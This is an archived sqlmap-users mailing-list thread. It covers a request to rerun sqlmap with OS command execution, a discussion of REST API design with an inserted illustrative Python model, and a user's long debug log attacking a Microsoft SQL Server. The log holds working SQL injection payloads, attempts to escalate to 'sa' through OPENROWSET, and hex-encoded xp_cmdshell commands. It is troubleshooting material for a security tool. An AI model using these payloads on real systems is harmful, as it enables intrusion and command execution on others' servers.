>> > All in all, can you please relaunch sqlmap (make sure you run git pull >> > first to sync to the GitHub repository) with the following syntax: >> >> Command line: >> >> python sqlmap.py -u "http://172.16.71.138:7879/index.php" >> --data="act=auth-login&pag=login&username=admin&password=admin" -p >> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 >> --parse-errors -t traffic.log --answers "language does the web server >> support=4,do you want to use for writable=2,comma separate list of >> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y" >> >> Feel free to report back the result, the entire standard output of >> sqlmap and send me the traffic.log. >> >> Thank you. >> Bernardo >> > > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Andres R. <and...@gm...> - 2014-03-21 17:30:27
|
Thank you so much for the comments, they are going to be very helpful when building our API :) Love to see open source projects helping themselves On Fri, Mar 21, 2014 at 9:32 AM, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi Andres, > > The API is indeed "up and running for a while", but we haven't yet > properly documented yet so probably not as widely used as it could be. > > With regards to your questions: > > * Technology stack: we've decided to go with a RESTful API over > XML-RPC for simplicity of protocol, ease of definition of methods, > etc. I had researched a number of minimalistic web servers in Python > at the time and the one that was one-file only and proved to be solid > and maintained was and still is Bottle[1]. It's well documented, easy > to use and intuitive in my opinion. > > * We are happy with the technology we use and have no plans to change > it, but instead extend and maintain the API over time, check out its > source code if you're interested[2]. > > * Someone has tested it under load, the results were good, but I am > sure there is room for improvements here. > > * We have not implemented session management in the API (a front-end > would have so), instead we have the concept of tasks. A task[3] is an > object. You can create, edit, query, modify a task given the taskid. > Task ID is generated with a request to /task/new[4]. The task is a > series of independent sqlmap scans that modify the same sqlmap session > file and the data is stored in a local SQLite database. > Furthermore, when you run the sqlmappi.py, an admin ID is created. > This is the only privileged "user" and can request admin methods like > listing all tasks, deleting them, etc. > > * Recommendations: try to keep it simply, wrap all standard output and > error to a custom object that writes in a database[5] so these can be > retrieved via the API too. 
> > [1] http://bottlepy.org/docs/0.12/ > https://raw.githubusercontent.com/defnull/bottle/master/bottle.py > [2] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py > [3] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L91 > and https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L103 > [4] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L339 > [5] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L202 > > Good luck! > > Bernardo > > On 20 March 2014 19:05, Miroslav Stampar <mir...@gm...> wrote: >> Great reply :) >> >> Bye >> >> On Mar 20, 2014 4:13 PM, "Brandon Perry" <bpe...@gm...> wrote: >>> >>> I can't comment on building the API, but I maintain C# bindings to the >>> sqlmap REST API and, programmatically, it works really well. >>> >>> There is no authentication, but I only ever run it on localhost anyway so >>> this isn't a big deal to me. >>> >>> I have tested it under relatively heavy load (one API instance testing >>> multiple applications) and it has been performant. I don't recall ever >>> saying "Man, I wish this were faster". >>> >>> JSON is totally the way to go for data requests/responses. >>> >>> One recommendation I have since I deal with many APIs on a daily basis is >>> please don't assume the programmers will be interacting with your API with >>> language X. The Metasploit MSGPACK API is a good example of this and is very >>> cumbersome to use from a strongly typed language. Arachni falls into a >>> similar field relying on Ruby-style marshalling or YAML which I simply can't >>> do from, say, C#. >>> >>> Aside from sqlmap, I also really like the cuckoo-sandbox API. 
>>> >>> >>> >>> On Thu, Mar 20, 2014 at 10:00 AM, Andres Riancho >>> <and...@gm...> wrote: >>>> >>>> List, >>>> >>>> I'm going to abuse the list a little bit, and poke your brains for >>>> a while, so be prepared :) >>>> >>>> The w3af project wants to implement its own REST API to expose the >>>> w3afCore and KnowledgeBase objects. The core allows users to configure >>>> the plugins and start the scan, and the knowledge base holds the >>>> vulnerabilities. >>>> >>>> You guys implemented a REST API for sqlmap, which has been up and >>>> running for a while now. >>>> >>>> What I wanted to know is: >>>> * What's the technology stack you guys used for creating the REST >>>> API? >>>> * Were you happy with it? Would you use something different if >>>> you had the chance? >>>> * Have you tested the API under heavy load? >>>> * Do you have the concept of sessions and users in the API? Why >>>> not? >>>> * Any recommendations on API design? (paths, results, hrefs, >>>> etc.) >>>> >>>> Thanks! >>>> >>>> Regards, >>>> -- >>>> Andrés Riancho >>>> Project Leader at w3af - http://w3af.org/ >>>> Web Application Attack and Audit Framework >>>> Twitter: @w3af >>>> GPG: 0x93C344F3 >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> Learn Graph Databases - Download FREE O'Reilly Book >>>> "Graph Databases" is the definitive new guide to graph databases and >>>> their >>>> applications. Written by three acclaimed leaders in the field, >>>> this first edition is now available. Download your free book today! >>>> http://p.sf.net/sfu/13534_NeoTech >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... 
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >>> >>> ------------------------------------------------------------------------------ >>> Learn Graph Databases - Download FREE O'Reilly Book >>> "Graph Databases" is the definitive new guide to graph databases and their >>> applications. Written by three acclaimed leaders in the field, >>> this first edition is now available. Download your free book today! >>> http://p.sf.net/sfu/13534_NeoTech >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
From: Bernardo D. A. G. <ber...@gm...> - 2014-03-21 12:32:43
|
Hi Andres,

The API is indeed "up and running for a while", but we haven't properly documented it yet, so it is probably not as widely used as it could be.

With regards to your questions:

* Technology stack: we've decided to go with a RESTful API over XML-RPC for simplicity of protocol, ease of definition of methods, etc. I had researched a number of minimalistic web servers in Python at the time and the one that was one-file only and proved to be solid and maintained was and still is Bottle[1]. It's well documented, easy to use and intuitive in my opinion.

* We are happy with the technology we use and have no plans to change it, but instead extend and maintain the API over time; check out its source code if you're interested[2].

* Someone has tested it under load, the results were good, but I am sure there is room for improvements here.

* We have not implemented session management in the API (a front-end would do so), instead we have the concept of tasks. A task[3] is an object. You can create, edit, query, modify a task given the taskid. Task ID is generated with a request to /task/new[4]. The task is a series of independent sqlmap scans that modify the same sqlmap session file and the data is stored in a local SQLite database. Furthermore, when you run sqlmapapi.py, an admin ID is created. This is the only privileged "user" and can request admin methods like listing all tasks, deleting them, etc.

* Recommendations: try to keep it simple, wrap all standard output and error to a custom object that writes in a database[5] so these can be retrieved via the API too.
[1] http://bottlepy.org/docs/0.12/ https://raw.githubusercontent.com/defnull/bottle/master/bottle.py [2] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py [3] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L91 and https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L103 [4] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L339 [5] https://github.com/sqlmapproject/sqlmap/blob/master/lib/utils/api.py#L202 Good luck! Bernardo On 20 March 2014 19:05, Miroslav Stampar <mir...@gm...> wrote: > Great reply :) > > Bye > > On Mar 20, 2014 4:13 PM, "Brandon Perry" <bpe...@gm...> wrote: >> >> I can't comment on building the API, but I maintain C# bindings to the >> sqlmap REST API and, programmatically, it works really well. >> >> There is no authentication, but I only ever run it on localhost anyway so >> this isn't a big deal to me. >> >> I have tested it under relatively heavy load (one API instance testing >> multiple applications) and it has been performant. I don't recall ever >> saying "Man, I wish this were faster". >> >> JSON is totally the way to go for data requests/responses. >> >> One recommendation I have since I deal with many APIs on a daily basis is >> please don't assume the programmers will be interacting with your API with >> language X. The Metasploit MSGPACK API is a good example of this and is very >> cumbersome to use from a strongly typed language. Arachni falls into a >> similar field relying on Ruby-style marshalling or YAML which I simply can't >> do from, say, C#. >> >> Aside from sqlmap, I also really like the cuckoo-sandbox API. >> >> >> >> On Thu, Mar 20, 2014 at 10:00 AM, Andres Riancho >> <and...@gm...> wrote: >>> >>> List, >>> >>> I'm going to abuse the list a little bit, and poke your brains for >>> a while, so be prepared :) >>> >>> The w3af project wants to implement its own REST API to expose the >>> w3afCore and KnowledgeBase objects. 
The core allows users to configure >>> the plugins and start the scan, and the knowledge base holds the >>> vulnerabilities. >>> >>> You guys implemented a REST API for sqlmap, which has been up and >>> running for a while now. >>> >>> What I wanted to know is: >>> * What's the technology stack you guys used for creating the REST >>> API? >>> * Were you happy with it? Would you use something different if >>> you had the chance? >>> * Have you tested the API under heavy load? >>> * Do you have the concept of sessions and users in the API? Why >>> not? >>> * Any recommendations on API design? (paths, results, hrefs, >>> etc.) >>> >>> Thanks! >>> >>> Regards, >>> -- >>> Andrés Riancho >>> Project Leader at w3af - http://w3af.org/ >>> Web Application Attack and Audit Framework >>> Twitter: @w3af >>> GPG: 0x93C344F3 >>> >>> >>> ------------------------------------------------------------------------------ >>> Learn Graph Databases - Download FREE O'Reilly Book >>> "Graph Databases" is the definitive new guide to graph databases and >>> their >>> applications. Written by three acclaimed leaders in the field, >>> this first edition is now available. Download your free book today! >>> http://p.sf.net/sfu/13534_NeoTech >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... 
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
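The task-oriented design Bernardo describes (no user sessions, a task id handed out by /task/new, one privileged admin identity created at start-up, and all output captured into a database so it can be fetched later) in a small self-contained Python model. This is an added illustration, not sqlmap's own lib/utils/api.py: the route names, the DatabaseLogHandler and TaskApi classes, the status strings and the dispatcher are assumptions chosen to mirror that design, and the "scan" only records log lines instead of launching an engine.

```python
"""Model of a task-based scanner API: task ids, one admin token, logs in SQLite.

Added example; not sqlmap code. Route names and class names are assumptions."""
import logging
import secrets
import sqlite3
from typing import Optional


class DatabaseLogHandler(logging.Handler):
    """Write every log record of a task into a 'logs' table instead of stdout/stderr."""

    def __init__(self, db: sqlite3.Connection, taskid: str) -> None:
        super().__init__()
        self.db, self.taskid = db, taskid

    def emit(self, record: logging.LogRecord) -> None:
        self.db.execute(
            "INSERT INTO logs(taskid, level, message) VALUES (?, ?, ?)",
            (self.taskid, record.levelname, record.getMessage()),
        )


class TaskApi:
    """Task registry: the task id is the only handle a client needs; no sessions."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE tasks(taskid TEXT PRIMARY KEY, status TEXT)")
        self.db.execute("CREATE TABLE logs(taskid TEXT, level TEXT, message TEXT)")
        # The single privileged identity, generated at start-up, never taken from input.
        self.admin_token = secrets.token_hex(16)

    # --- unprivileged, per-task methods ---
    def task_new(self) -> str:
        taskid = secrets.token_hex(8)  # unguessable; knowing it is the only 'auth' for a task
        self.db.execute("INSERT INTO tasks VALUES (?, 'not running')", (taskid,))
        return taskid

    def scan_start(self, taskid: str, target: str) -> bool:
        if not self._task_exists(taskid):
            return False
        log = logging.getLogger(f"task.{taskid}")
        log.setLevel(logging.INFO)
        log.propagate = False            # keep task output out of the process' own stderr
        log.handlers.clear()
        log.addHandler(DatabaseLogHandler(self.db, taskid))
        # A real implementation would launch the engine here; we only record what happened.
        log.info("testing connection to the target URL %s", target)
        log.warning("target URL is not stable")
        self.db.execute("UPDATE tasks SET status='terminated' WHERE taskid=?", (taskid,))
        return True

    def scan_log(self, taskid: str) -> list:
        rows = self.db.execute(
            "SELECT level, message FROM logs WHERE taskid=? ORDER BY rowid", (taskid,)
        ).fetchall()
        return [{"level": lvl, "message": msg} for lvl, msg in rows]

    # --- privileged methods: require the admin token ---
    def admin_list(self, token: str) -> Optional[dict]:
        if not secrets.compare_digest(token, self.admin_token):
            return None                  # constant-time compare, no detail leaked on failure
        return dict(self.db.execute("SELECT taskid, status FROM tasks").fetchall())

    def _task_exists(self, taskid: str) -> bool:
        return self.db.execute("SELECT 1 FROM tasks WHERE taskid=?", (taskid,)).fetchone() is not None


def route(api: TaskApi, method: str, path: str, body: Optional[dict] = None) -> dict:
    """REST-style dispatcher: /task/new, /scan/<id>/start, /scan/<id>/log, /admin/<token>/list."""
    parts = path.strip("/").split("/")
    if (method, parts) == ("GET", ["task", "new"]):
        return {"taskid": api.task_new(), "success": True}
    if method == "POST" and len(parts) == 3 and parts[0] == "scan" and parts[2] == "start":
        return {"success": api.scan_start(parts[1], (body or {}).get("url", ""))}
    if method == "GET" and len(parts) == 3 and parts[0] == "scan" and parts[2] == "log":
        return {"log": api.scan_log(parts[1]), "success": True}
    if method == "GET" and len(parts) == 3 and parts[0] == "admin" and parts[2] == "list":
        tasks = api.admin_list(parts[1])
        return {"success": tasks is not None, "tasks": tasks or {}}
    return {"success": False, "message": "Unknown route"}
```

Because the task id and the admin token are the only credentials in this model, anything that can reach the listener can drive it, which is why a server built this way should bind to localhost only, as Brandon does with the real API.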
From: Bernardo D. A. G. <ber...@gm...> - 2014-03-21 12:12:51
|
Hi Daniel,

There's no need to provide the --sql-file, sqlmap will use the file itself as part of the internal logic when --dbms-cred is provided.

However, OPENROWSET on Microsoft SQL Server 2005+ by default is not executable by non-DBA users or users that haven't been specifically granted permission to that builtin function, so it is unlikely that the unprivileged session user will be able to execute it.

I see what you're trying to do, but vertical privilege escalation to DBA via OPENROWSET works with default settings on Microsoft SQL Server 2000 and previous versions only. According to the parsed DBMS error messages, the session user indeed is not a DBA, hence no command execution.

Bernardo

On 21 March 2014 08:09, Daniel Shapira <don...@gm...> wrote:
> Hey,
> I am trying to write on MSSQL with either os-shell or any other flag (none works for me).
> I know that 'Ad Hoc Distributed Queries' are disabled -> OpenRowSet is disabled as well.
> sqlmap initially gets into the db as a secondary user; there are 2 users in the db, SA which is the administrator and the other user which sqlmap gets at start.
> The password for sa is NULL - no password at all, I know that by executing --users --passwords.
> So with all this data I am trying to run:
> sqlmap -u "target" --risk=5 --level=5 --random-agent --threads=10 -o --os-shell --dbms-cred=sa: --fresh-queries -v3 --parse-errors -t traffic.txt --sql-file=/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql
> I also tried without the sql-file as I guess sqlmap should try it by itself but I get the same results.
> So my guess is that sqlmap can't get into the 'sa' user because if it could get in, it would enable the openrowset. Am I right?
> i can send the traffic.txt privately > ********************** > > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: keyword > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: keyword=f') AND 1202=1202 AND ('NhGb' LIKE 'NhGb > Vector: AND [INFERENCE] > > Type: error-based > Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING > clause > Payload: keyword=f') AND 7343=CONVERT(INT,(SELECT > CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN > (7343=7343) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('PGJx' LIKE > 'PGJx > Vector: AND [RANDNUM]=CONVERT(INT,(SELECT > '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) > > Type: stacked queries > Title: Microsoft SQL Server/Sybase stacked queries > Payload: keyword=f'); WAITFOR DELAY '0:0:5'-- > Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-- > > Type: AND/OR time-based blind > Title: Microsoft SQL Server/Sybase time-based blind > Payload: keyword=f') WAITFOR DELAY '0:0:5'-- > Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-- > --- > [03:57:43] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2008 R2 or 7 > web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5 > back-end DBMS: Microsoft SQL Server 2008 > [03:57:43] [INFO] executing SQL statements from given file(s) > [03:57:43] [ERROR] unresolved variable 'ENABLE' in SQL file > '/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql' > do you want to provide the substitution values? 
[y/N] y > insert value for variable 'ENABLE': 1 > [03:57:46] [DEBUG] executing SQL data execution query: 'EXEC > master..sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; > EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH > OVERRIDE; EXEC sp_configure 'show advanced options', 0; RECONFIGURE WITH > OVERRIDE' > [03:57:46] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options', > 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed > Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced > options', 0; RECONFIGURE WITH OVERRIDE-- > [03:57:46] [WARNING] time-based comparison requires larger statistical > model, please wait.............................. > [03:57:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [03:57:53] [WARNING] parsed DBMS error message: > 'System.NullReferenceException: Object reference not set to an instance of > an object.' > [03:57:53] [DEBUG] done > EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE WITH > OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; > RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0; > RECONFIGURE WITH OVERRIDE: 'NULL' > [03:57:53] [DEBUG] going to use D:/Microsoft SQL > Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log as temporary files directory > on Microsoft SQL Server 2005 and 2008, OPENROWSET function is disabled by > default. This function is needed to execute statements as another DBMS user > since you provided the option '--dbms-creds'. If you are DBA, you can enable > it. Do you want to enable it? 
[Y/n] Y > [03:59:06] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options', > 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed > Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced > options', 0; RECONFIGURE WITH OVERRIDE-- > [03:59:06] [WARNING] it is very important not to stress the network adapter > during usage of time-based payloads to prevent potential errors > [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [03:59:06] [WARNING] parsed DBMS error message: > 'System.NullReferenceException: Object reference not set to an instance of > an object.' > [03:59:06] [INFO] testing if current user is DBA > [03:59:06] [PAYLOAD] f') AND 7808=CONVERT(INT,(SELECT > CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN > (IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1) > THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('FSjT' LIKE > 'FSjT > [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [03:59:06] [WARNING] parsed DBMS error message: > 'System.Data.SqlClient.SqlException: Conversion failed when converting the > varchar value 'qsgjq0qywuq' to data type int.' > [03:59:06] [DEBUG] performed 1 queries in 0.13 seconds > [03:59:06] [WARNING] functionality requested probably does not work because > the curent session user is not a database administrator > [03:59:06] [DEBUG] creating a support table to write commands standard > output to > [03:59:06] [PAYLOAD] f');DROP TABLE sqlmapoutput-- > [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [03:59:06] [WARNING] parsed DBMS error message: > 'System.NullReferenceException: Object reference not set to an instance of > an object.' 
> [03:59:06] [PAYLOAD] f');CREATE TABLE sqlmapoutput(id INT PRIMARY KEY > IDENTITY, data NVARCHAR(4000))-- > [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [03:59:06] [WARNING] parsed DBMS error message: > 'System.NullReferenceException: Object reference not set to an instance of > an object.' > [03:59:06] [INFO] testing if xp_cmdshell extended procedure is usable > [03:59:06] [PAYLOAD] f');SELECT * FROM > OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @ktdg > VARCHAR(8000);SET > @ktdg=0x6563686f2031203e2022443a2f4d6963726f736f66742053514c205365727665722f4d5353514c31305f35302e4d5353514c5345525645522f4d5353514c2f4c6f672f746d70636f6974652e74787422;EXEC > master..xp_cmdshell @ktdg')-- > [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [03:59:06] [WARNING] parsed DBMS error message: > 'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT > 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries' > because this component is turned off as part of the security configuration > for this server. A system administrator can enable the use of 'Ad Hoc > Distributed Queries' by using sp_configure. For more information about > enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in > SQL Server Books Online.' > [03:59:06] [PAYLOAD] f');BULK INSERT sqlmapoutput FROM 'D:/Microsoft SQL > Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpcoite.txt' WITH (CODEPAGE='RAW', > FIELDTERMINATOR='WaPrHIHUBH', ROWTERMINATOR='vOTmRkjwAa')-- > [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [03:59:06] [WARNING] parsed DBMS error message: > 'System.Data.SqlClient.SqlException: You do not have permission to use the > bulk load statement.' 
> [03:59:06] [PAYLOAD] f');SELECT * FROM OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @wgiw VARCHAR(8000);SET @wgiw=0x64656c202f46202f5120443a5c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70636f6974652e747874;EXEC master..xp_cmdshell @wgiw')--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'Ad Hoc Distributed Queries' by using sp_configure. For more information about enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in SQL Server Books Online.'
> [03:59:07] [PAYLOAD] f') AND 9097=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput)+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('tzMl' LIKE 'tzMl
> [03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'qsgjq0qywuq' to data type int.'
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51 AND ('EirG' LIKE 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>54 AND ('EirG' LIKE 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>56 AND ('EirG' LIKE 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>57 AND ('EirG' LIKE 'EirG
> [03:59:07] [INFO] retrieved:
> [03:59:07] [DEBUG] performed 4 queries in 0.38 seconds
> [03:59:07] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
> [03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51) WAITFOR DELAY '0:0:5'--
> [03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
> [03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>48) WAITFOR DELAY '0:0:5'--
> [03:59:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:08] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
> [03:59:08] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>1) WAITFOR DELAY '0:0:5'--
> [03:59:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:13] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
> do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
> [04:00:34] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>47) WAITFOR DELAY '0:0:5'--
> [04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:39] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
> [04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))!=48) WAITFOR DELAY '0:0:5'--
> [04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:39] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
> [04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>51) WAITFOR DELAY '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
> [04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>48) WAITFOR DELAY '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
> [04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>1) WAITFOR DELAY '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
> [04:00:40] [INFO] retrieved: 0
> [04:00:40] [DEBUG] performed 8 queries in 92.65 seconds
> [04:00:40] [PAYLOAD] f');DELETE FROM sqlmapoutput--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
> [04:00:40] [ERROR] it seems that the temporary directory ('D:/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log') used for storing console output within the back-end file system does not have writing permissions for the DBMS process. You are advised to manually adjust it with option --tmp-path switch or you will not be able to retrieve the commands output
> [04:00:40] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
> [04:00:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
> os-shell> x
>
>
> ------------------------------------------------------------------------------
